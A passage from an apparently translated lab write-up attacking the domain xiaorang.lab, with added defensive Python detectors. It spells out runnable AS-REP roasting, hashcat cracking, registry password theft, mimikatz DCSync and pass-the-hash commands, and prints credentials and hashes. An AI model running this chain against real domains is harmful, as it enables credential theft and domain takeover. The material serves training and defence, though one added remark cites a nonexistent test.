    • Remove the spaces from the usernames (for example CHEN YAN → chenyan, consistent with the earlier email prefix such as chenyan@xiaorang.lab).
    • Convert everything to lower case (domain usernames are usually case-insensitive, but keeping them consistent with the email prefix is recommended).

    This can be done in bulk on username.txt with a script:

    # remove spaces and convert to lower case
    sed -i 's/ //g' username.txt
    tr '[:upper:]' '[:lower:]' < username.txt > username_fixed.txt
  2. Confirm that the users are domain users
    From the earlier email column (for example chenyan@xiaorang.lab) it can be seen that the email prefix is probably the real username, so it is recommended to use the email prefixes directly as the user list (rather than the display names in the username column).

    Extract the email prefixes to generate a new user list:

    # assuming the raw data file is data.txt, extract the prefix of the email column
    grep -oP '[a-zA-Z0-9]+(?=@xiaorang.lab)' data.txt > valid_usernames.txt
  3. Re-run the tool
    Using the corrected user list:

    proxychains4 impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile valid_usernames.txt xiaorang.lab/
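The page's own username script (above) and the sed/tr/grep normalization just described both work on the sqlmap table, and both break on the same details: the header and separator rows, sqlmap's WARNING line printed inside the table, rows whose email is not in the domain, and duplicated people (yuhui, changyun, nongyan and others appear twice in the dump). The following is an added example, not code from the original post, that parses that table format generically and produces both candidate lists at once, de-duplicated; the sample rows are constructed to mirror the page's output and the domain name is taken from the page.

```python
import re

# Constructed sample in the shape of the sqlmap --dump output shown above:
# a handful of rows only, with sqlmap's in-table WARNING line, a duplicated
# email prefix (yuhui) and one row whose email is not a domain address.
SAMPLE_DUMP = """\
Database: oa_db
Table: oa_users
[500 entries]
+-----+----------------------------+-------------+-----------------+
| id  | email                      | phone       | username        |
+-----+----------------------------+-------------+-----------------+
[21:58:48] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 245 | chenyan@xiaorang.lab       | 18281528743 | CHEN YAN        |
| 269 | zhangxin@xiaorang.lab      | 15763185760 | ZHANG XIN       |
| 394 | yuhui@xiaorang.lab         | 18058257228 | YU HUI          |
| 414 | yuhui@xiaorang.lab         | 15215599294 | YU HUI          |
| 999 | not-an-address             | 10000000000 | BROKEN ROW      |
+-----+----------------------------+-------------+-----------------+
"""


def parse_sqlmap_table(text):
    """Parse an ASCII table as printed by sqlmap --dump into a list of dicts.

    Only lines starting with '|' are table rows; the first such line is the
    header. Separator lines ('+---+'), sqlmap log lines and blank lines are
    ignored, and a row whose cell count differs from the header is dropped
    rather than mis-aligned.
    """
    header = None
    rows = []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        # '| a | b |'.split('|') -> ['', ' a ', ' b ', ''] ; keep the inner cells
        cells = [c.strip() for c in line.strip().split("|")[1:-1]]
        if header is None:
            header = cells
            continue
        if len(cells) != len(header):
            continue
        rows.append(dict(zip(header, cells)))
    return rows


def candidate_usernames(rows, domain="xiaorang.lab"):
    """Return (from_email, from_display), both de-duplicated with order kept.

    from_email: the local part of every email address in `domain` (the list
    the text recommends). from_display: the 'username' column with spaces
    removed and lower-cased (the sed/tr transformation in the text).
    """
    from_email, from_display = [], []
    seen_email, seen_display = set(), set()
    addr_re = re.compile(r"([A-Za-z0-9._-]+)@" + re.escape(domain))
    for row in rows:
        m = addr_re.fullmatch(row.get("email", ""))
        if m and m.group(1) not in seen_email:
            seen_email.add(m.group(1))
            from_email.append(m.group(1))
        display = row.get("username", "").replace(" ", "").lower()
        if display and display not in seen_display:
            seen_display.add(display)
            from_display.append(display)
    return from_email, from_display


if __name__ == "__main__":
    rows = parse_sqlmap_table(SAMPLE_DUMP)
    emails, displays = candidate_usernames(rows)
    print(f"{len(rows)} rows parsed, {len(emails)} unique email prefixes, "
          f"{len(displays)} unique display-name forms")
    with open("valid_usernames.txt", "w", encoding="utf-8") as out:
        out.write("\n".join(emails) + "\n")
```

Run against the real dump by passing the saved console output (or the CSV sqlmap writes under its output directory) instead of SAMPLE_DUMP. The email-prefix list is the one to keep: the "BROKEN ROW" entry shows that the display-name transformation happily produces a candidate for a row that has no domain identity at all.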
proxychains4 impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile username.txt xiaorang.lab/

$krb5asrep$23$zhangxin@XIAORANG.LAB:0eaae5004362e230adf54772de8225df$35bc9e693079d797db4b7820fd7ad48b11bcae7895ac91179beac40e949c6035b67d827360dc66c9d893b1b757ab28d68a8efde201ea89efc369d9a2445de4ed866d3447666fa2318e19ec030b2ac6af434789a38a7872aad04aa56208c5c72d2951ac8032e804814ba44776c51b84f8f8fed45d935eaf7637530fb0b2c31178f12f77e451345febd307bb548c6d27896d2da3196b2a07937634684899ab8adb68c488cf48d6c694bb07f6ee61c5e3b6e59a9ff350f8932b4958dfe7e6777131a1d6c5cf91696de1e1d008684538783f914c6139a8336b7ef7bb186bce14959ee0a32894c29ac2589dd25e23

Kerberos AS-REP Roasting: this is an attack against the Kerberos authentication protocol whose main goal is to obtain, from Active Directory, encrypted credential material for users that do not require pre-authentication. The material can then be brute-forced offline, which is why it specifically targets user accounts with Kerberos pre-authentication disabled.

In this way we can consider ourselves to have obtained a user list. Next we can use this username.txt file to try to enumerate the accounts that do not have pre-authentication enabled. Pre-authentication is normally on by default, but once it has been turned off an attacker can use a known username to request a ticket from Kerberos port 88 on the domain controller. In that case the domain controller performs no verification at all and directly returns a TGT (Ticket Granting Ticket) together with a Login Session Key encrypted with the user's hash. The attacker can therefore crack that hash-encrypted Login Session Key offline, and with a good enough wordlist recover the user's plaintext password.
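The two facts a defender needs from the paragraph above are which accounts have pre-authentication turned off (the only ones this attack applies to) and, once a hash line like the one shown earlier turns up in a tool's output or a potfile, which account it belongs to so the password can be reset. The following is an added example, not from the original post: it decodes the userAccountControl bits of a directory export and splits a hashcat mode-18200 line into its fields. The flag values are Microsoft's documented userAccountControl bits; the user records are constructed (only the zhangxin result mirrors the page).

```python
import re

# userAccountControl bit flags (Microsoft's ADS_USER_FLAG_ENUM values).
UF_ACCOUNTDISABLE = 0x0000002
UF_NORMAL_ACCOUNT = 0x0000200
UF_DONT_REQUIRE_PREAUTH = 0x0400000

# Constructed directory export; values are made up except that zhangxin is the
# one account on the page that actually returned an AS-REP.
SAMPLE_USERS = [
    {"sAMAccountName": "zhangxin", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "yuxuan", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "svc_old", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE},
    {"sAMAccountName": "chenyan", "userAccountControl": UF_NORMAL_ACCOUNT},
]


def preauth_disabled(records, include_disabled=False):
    """Return the sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set.

    Disabled accounts are left out by default: the KDC refuses them an AS-REP,
    so they are not roastable until re-enabled, but they still deserve a
    clean-up, hence the switch.
    """
    found = []
    for rec in records:
        uac = int(rec["userAccountControl"])
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(rec["sAMAccountName"])
    return found


def ldap_filter_preauth_disabled():
    """The LDAP filter that performs the same check directly against the domain.
    1.2.840.113556.1.4.803 is the bitwise-AND matching rule; 4194304 == 0x400000."""
    return ("(&(objectCategory=person)(objectClass=user)"
            "(userAccountControl:1.2.840.113556.1.4.803:=4194304))")


# hashcat mode 18200 line: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<edata>
# optionally followed by :<password> once it sits in a potfile.
ASREP_RE = re.compile(
    r"\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)(?::(?P<cracked>.*))?"
)
ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}


def parse_asrep_line(line):
    """Split an AS-REP hash line into fields so it can be tied back to an account.
    Returns None for anything that is not in the mode-18200 layout."""
    m = ASREP_RE.fullmatch(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    fields["etype_name"] = ETYPE_NAMES.get(fields["etype"], "unknown")
    return fields


if __name__ == "__main__":
    print("roastable:", preauth_disabled(SAMPLE_USERS))
    print("filter:   ", ldap_filter_preauth_disabled())
```

An etype of 23 (RC4-HMAC, the "$23$" in the page's output) means the AS-REP was encrypted with the NT hash, which is what makes the offline attack cheap; clearing DONT_REQ_PREAUTH on the accounts the first function reports, and rotating their passwords, closes the window.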

Reference: detailed hashcat brute-force tutorial (with common examples) | lololowe的博客

gzip -d rockyou.txt.gz
hashcat -a 0 -m 18200 --force hash.txt rockyou.txt

$krb5asrep$23$zhangxin@XIAORANG.LAB:c300e2e460c8bf9d6a5c1720f1302e93$6c777af19d5196483195533338ee7480166b30b38c988d2e48fc34566435cab3763d21885d15e2f5baf161562b5158c0b6e82d06aa7892d5a8c477e41f96e1a789845f5e1f5e3af50b50d0aa2220f1df85bce2026fd424a9d642e636cf8321a7eb44cb1da9863a9b53d178916d0b013cbb9bcaf5acb03f8f7a6b82afaf31f72242ef295c9fd99ad621fd615cefb546fe5759b202f5e2a4a955d6b435c23529033953731af7e855ff359069b8efcf2855232d0a3a5b2e23bb549535c97b4a17f1ff7aa581f6826c5fdab2adc743154ff2a55ce6c50cf1d1e26b4e165f8e5c7f9c7548ae6c6af8c2dea0ae8d01:strawberry

Remote desktop to 172.22.6.25 with zhangxin@XIAORANG.LAB (username) and strawberry (password)

PS: transferring files over remote desktop

https://blog.csdn.net/qq_56426046/article/details/126854991

Using WSL causes problems with the GUI, so use a VM instead

./BloodHound --no-sandbox

First get BloodHound set up

C:\Users\zhangxin\Desktop>SharpHound.exe -c all
---------------------------------------------
Initializing SharpHound at 22:11 on 2025/8/11
---------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain XIAORANG.LAB using path CN=Schema,CN=Configuration,DC=XIAORANG,DC=LAB
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 20 MB RAM
Status: 132 objects finished (+132 ∞)/s -- Using 29 MB RAM
Enumeration finished in 00:00:00.7194614
Compressing data to .\20250811221146_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 22:11 on 2025/8/11! Happy Graphing!

As can be seen, on the workstation 172.22.6.25 there are three users with logon sessions

And the user yuxuan abuses the SID History feature (SIDHistory is an attribute introduced to support domain migration scenarios: when an object is migrated from one domain to another, a new SID is created in the new domain as the object's objectSid, and the SID it had in the previous domain is added to the object's sIDHistory attribute, so the object keeps the access rights associated with its SID in the original domain)

Put simply, yuxuan is effectively a domain admin, so all we need now is yuxuan's privileges, and then we dump the hashes.
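The SIDHistory description above also gives the rule for spotting this kind of abuse: a legitimate migration only ever adds SIDs from the source domain, so a sIDHistory value that belongs to the current domain, or that is a well-known privileged SID such as RID 512 (Domain Admins), has no migration explanation. The following is an added example, not from the original post, that applies that rule to a directory export; the domain SID and every record are constructed (the yuxuan entry reproduces the page's finding in spirit, not with the lab's real SIDs).

```python
# Well-known RIDs that have no business in a sIDHistory value, plus the one
# privileged SID that is not domain-relative (from Microsoft's well-known SID list).
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}
PRIVILEGED_SIDS = {"S-1-5-32-544": "BUILTIN\\Administrators"}

# Constructed values; not the lab's real domain SID.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"

SAMPLE_EXPORT = [
    {"sAMAccountName": "yuxuan", "sIDHistory": [f"{DOMAIN_SID}-512"]},
    {"sAMAccountName": "zhangxin", "sIDHistory": []},
    # a genuine migration: a plain user RID from a different (source) domain
    {"sAMAccountName": "migrated", "sIDHistory": ["S-1-5-21-4444444444-5555555555-6666666666-1130"]},
    {"sAMAccountName": "svc_x", "sIDHistory": ["S-1-5-32-544"]},
]


def split_sid(sid):
    """'S-1-5-21-a-b-c-512' -> ('S-1-5-21-a-b-c', 512)."""
    head, _, rid = sid.rpartition("-")
    return head, int(rid)


def suspicious_sid_history(records, own_domain_sid):
    """Return (account, history_sid, reasons) for each sIDHistory entry that is
    a privileged well-known SID, a privileged RID of any domain, or any SID of
    the current domain (which a migration never produces)."""
    findings = []
    for rec in records:
        for hist in rec.get("sIDHistory", []):
            head, rid = split_sid(hist)
            reasons = []
            if hist in PRIVILEGED_SIDS:
                reasons.append(f"well-known privileged SID {PRIVILEGED_SIDS[hist]}")
            if head == own_domain_sid:
                reasons.append("SID belongs to the current domain, not to a migration source")
            if head.startswith("S-1-5-21-") and rid in PRIVILEGED_RIDS:
                reasons.append(f"RID {rid} = {PRIVILEGED_RIDS[rid]}")
            if reasons:
                findings.append((rec["sAMAccountName"], hist, reasons))
    return findings


if __name__ == "__main__":
    for account, sid, why in suspicious_sid_history(SAMPLE_EXPORT, DOMAIN_SID):
        print(f"{account}: {sid} -> {'; '.join(why)}")
```

The input for a real run is the result of an LDAP query with the filter `(sIDHistory=*)` requesting the sIDHistory attribute, and the domain's own SID comes from the objectSid of the domain object. Anything the function reports should be treated as a persistence mechanism rather than a migration leftover, and removed.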

Then take a look at the users

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# queries the Windows logon-related configuration stored in the system registry
DefaultUserName    REG_SZ    yuxuan
DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
DefaultDomainName    REG_SZ    xiaorang.lab
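The registry query above is also the check a host baseline should run: an auto-logon password kept as a readable REG_SZ under Winlogon is recoverable by any user who can read the key, which is exactly what happened here. The following is an added example, not from the original post, that parses `reg query` output and raises the findings; the sample output is constructed in the same shape as the page's, with a placeholder instead of the real password.

```python
import re

# Constructed output in the shape 'reg query' prints for the Winlogon key.
# The password is a placeholder, not the value from the lab.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    yuxuan
    DefaultDomainName    REG_SZ    xiaorang.lab
    DefaultPassword    REG_SZ    <constructed-placeholder>
    Shell    REG_SZ    explorer.exe
"""

# value-name, whitespace, REG_* type, optional data
REG_LINE = re.compile(r"^\s*(?P<name>\S+)\s+(?P<type>REG_[A-Z_]+)\s*(?P<data>.*?)\s*$")


def parse_reg_query(text):
    """Map value name -> (type, data) from 'reg query' output.
    Key-path lines and blank lines do not match and are skipped."""
    values = {}
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m:
            values[m["name"]] = (m["type"], m["data"])
    return values


def autologon_findings(values):
    """Return the baseline findings for the Winlogon key contents."""
    findings = []
    if values.get("AutoAdminLogon", ("", "0"))[1] == "1":
        findings.append("AutoAdminLogon is enabled")
    pw = values.get("DefaultPassword")
    if pw is not None and pw[1] != "":
        who = values.get("DefaultUserName", ("", "?"))[1]
        dom = values.get("DefaultDomainName", ("", ""))[1]
        findings.append(f"DefaultPassword stored as readable REG_SZ for {dom}\\{who}")
    return findings


if __name__ == "__main__":
    for finding in autologon_findings(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print(finding)
```

Where unattended logon is genuinely required, the Sysinternals Autologon tool stores the password as an LSA secret instead of a plain DefaultPassword value, and the account used should be a low-privilege one; a domain admin, as here, is the worst case.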

That gives us yuxuan's password

We can see there is an auto-logon user, and it is exactly yuxuan; RDP in with this user and dump the domain admin hashes

So we switch to the yuxuan user and use this abused SID to go straight at the DC; since we retain domain admin access, we simply dump the hashes

C:\Users\yuxuan\Desktop>mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
500     Administrator   04d93ffd6f5f6e4490e0de23f240a5e9
  1. "lsadump::dcsync /domain:xiaorang.lab /all /csv"
    This is the core mimikatz module and its parameters:
    • lsadump::dcsync: invokes the DCSync module. DCSync is a technique that abuses the synchronization mechanism between Active Directory domain controllers (DCs), based on the MS-DRSR protocol, to obtain user credentials without executing any code on a domain controller.
    • /domain:xiaorang.lab: specifies the target domain as xiaorang.lab (replace with the actual domain name).
    • /all: retrieves credential information for every user in the domain (administrators, regular users, etc.).
    • /csv: sets the output format to CSV (comma-separated values) for easier processing and analysis afterwards.
  2. "exit"
    Exits mimikatz automatically once the DCSync operation completes, so there is no need to type exit manually.
  • Function: the command impersonates a domain controller's synchronization request and extracts the NTLM hashes, SIDs and other information of all users from the domain controller of the target domain (xiaorang.lab); these hashes can then be used for Pass-the-Hash attacks and, from there, lateral movement or privilege escalation.
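Because DCSync is "a synchronization request from something that is not a domain controller", that is also what a detection keys on: security event 4662 on the DC records the replication control-access rights being exercised, and the subject should only ever be a DC machine account (or a known replicating service). The following is an added example, not from the original post, that applies this rule over constructed 4662 records; the three replication-right GUIDs are the AD schema's extended-rights values, the rest of each record (class GUIDs, access masks, subjects) is sample data.

```python
# Control-access right GUIDs for directory replication (AD schema extended rights).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

DOMAIN_CLASS = "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"   # domainDNS class GUID
USER_CLASS = "{bf967aba-0de6-11d0-a285-00aa003049e2}"     # user class GUID

# Constructed security event 4662 records, as the event XML fields would be
# read out of a log pipeline. Names follow the page; the events themselves are made up.
SAMPLE_4662 = [
    {   # a DC replicating from its peer: normal noise
        "EventID": 4662, "SubjectUserName": "DC-PROGAME$", "SubjectDomainName": "XIAORANG",
        "ObjectType": "%" + DOMAIN_CLASS, "AccessMask": "0x100",
        "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t" + DOMAIN_CLASS,
    },
    {   # a user account exercising replication rights on the domain object
        "EventID": 4662, "SubjectUserName": "yuxuan", "SubjectDomainName": "XIAORANG",
        "ObjectType": "%" + DOMAIN_CLASS, "AccessMask": "0x100",
        "Properties": ("%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t"
                       "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t" + DOMAIN_CLASS),
    },
    {   # an unrelated property read on a user object
        "EventID": 4662, "SubjectUserName": "zhangxin", "SubjectDomainName": "XIAORANG",
        "ObjectType": "%" + USER_CLASS, "AccessMask": "0x10",
        "Properties": "%%7685\n\t" + USER_CLASS,
    },
]


def detect_dcsync(events, dc_accounts, allowlist=()):
    """Flag 4662 events in which a principal other than a known DC (or an
    allow-listed replicating service account) exercised a replication right.

    dc_accounts: machine accounts of the legitimate DCs, e.g. ['DC-PROGAME$'].
    allowlist:   accounts that replicate by design (directory sync services).
    """
    dcs = {a.upper() for a in dc_accounts}
    allowed = {a.upper() for a in allowlist}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        rights = [name for guid, name in REPLICATION_GUIDS.items() if guid in props]
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in dcs or subject.upper() in allowed:
            continue
        hits.append({"subject": f'{ev.get("SubjectDomainName", "")}\\{subject}', "rights": rights})
    return hits


if __name__ == "__main__":
    for hit in detect_dcsync(SAMPLE_4662, dc_accounts=["DC-PROGAME$"]):
        print(f"possible DCSync by {hit['subject']}: {', '.join(hit['rights'])}")
```

These events exist only when Directory Service Access auditing is enabled and the domain object's SACL audits control-access operations; a hit is then correlated with the 4624 logon carrying the same logon id to find the source host. An empty dc_accounts list (second assertion in the test) flags the DC's own replication too, so the list has to be maintained rather than guessed from a trailing `$`.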


With the hash in hand, just pass the hash.

proxychains4 /usr/bin/impacket-wmiexec -hashes 00000000000000000000000000000000:04d93ffd6f5f6e4490e0de23f240a5e9 administrator@172.22.6.12

flag{fd60ce54-3cae-440a-afbd-4c5bc0d6a9c5}


proxychains4 impacket-smbexec -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.25 -codec gbk



Author: q1n9
Copyright: unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit q1n9 as the source when reposting!